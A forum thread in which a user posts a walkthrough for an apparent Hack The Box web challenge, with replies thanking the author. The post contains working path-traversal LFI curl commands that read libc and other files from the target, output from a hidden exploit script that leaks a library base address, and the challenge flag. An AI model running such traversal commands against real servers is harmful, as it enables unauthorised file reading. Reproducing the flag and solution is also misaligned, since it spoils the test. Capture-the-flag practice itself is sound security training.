Possibly Related Threads…

Phoka · (This post was last modified: Feb 25, 2025, 04:49 AM by Phoka.)

First save the libc.so.6 file from the web (LFI) to you current dir

curl -s 'http://94.237.54.42:49922/view.php?image=/../../../../usr/lib/x86_64-linux-gnu/libc.so.6' | grep -oP 'data:image/png;base64,[^"]+' | sed 's/^data:image\/png;base64,//' | base64 -d > ./libc.so.6

___________________________________________________________________________________________________________________
.
├── Dockerfile
├── flag.txt
├── index.php
├── libc.so.6
├── metadata_reader.so
├── start.sh
├── upload.php
├── uploads
│ ├── starry_night.png
│ └── the_potato_eaters.png
└── view.php
________________________________________________________________________________________________________

we will need to Upload a picture to the web (Png)

we will use a script for that

copy any normal PNG to your current dir
name it Picture.png
before running the script

Hidden Content

You must register or login to view this content.

after running the script

python exploit.py IP : Port
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[+] Opening connection to 94.2.5.6 on port 585: Done
[+] Receiving all data: Done (41.78KB)
[*]Closed connection to 94.2.4.6 port 585
[+] Found metadata_reader.so base: 7f7161a29000 (0x7f7161a29000)
Resetting Picture.png first...
STDOUT: 1 image files updated
STDOUT: 1 image files updated
STDOUT: 1 image files updated
STDOUT: 1 image files updated
STDOUT:
File uploaded successfully
<script>alert('File uploaded successfully as Picture.png');</script>
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
run curl -s 'http://94.2.5.6:585/view.php?image=/app/test.png' | grep -oP 'data:image/png;base64,[^"]+' | sed 's/^data:image\/png;base64,//' | base64 -d
[*]
then you will see the path of the exploit path the the final command is
[*]
curl -s 'http://94.2.5.6:585/view.php?image=/app/$$$the path of the exploit path$$$' | grep -oP 'data:image/png;base64,[^"]+' | sed 's/^data:image\/png;base64,//' | base64 -d
HTB{H4ck!ng_w3b_fr0m....}

cavour13 · Feb 25, 2025, 08:22 AM

LOL nice phoka ! i did it nicely in 1st 50th position

Phoka · Feb 26, 2025, 04:35 AM

(Feb 25, 2025, 08:22 AM)cavour13 Wrote: LOL nice phoka ! i did it nicely in 1st 50th position

Cool bros <3 that really is nice man
keep up the great work Smile

hellme · Mar 14, 2025, 02:28 PM

Good write-up! I really learned something from this. Thanks!

Phoka · Mar 14, 2025, 04:55 PM

(Mar 14, 2025, 02:28 PM)hellme Wrote: Good write-up! I really learned something from this. Thanks!

Cool boss

you must be really good at coding Python
because these code became a write up to you that means you went throught the fuctions of the code

right??

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	Hack the box Pro Labs, VIP, VIP+ 1 month free Method	RedBlock	23	2,161	48 minutes ago Last Post: kkkato
	[FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags	Techtom	20	2,490	Yesterday, 11:06 PM Last Post: op334
	[FREE] HackTheBox All Cheatsheets	Tamarisk	3	394	Yesterday, 10:36 PM Last Post: op334
	[FREE] 300+ Writeups PDF HackTheBox/HTB premium retired	Tamarisk	369	91,994	Yesterday, 04:10 PM Last Post: sabbyahmed
	CBBH Write Ups	hiddenhacker	22	6,226	Yesterday, 06:39 AM Last Post: Usercomplex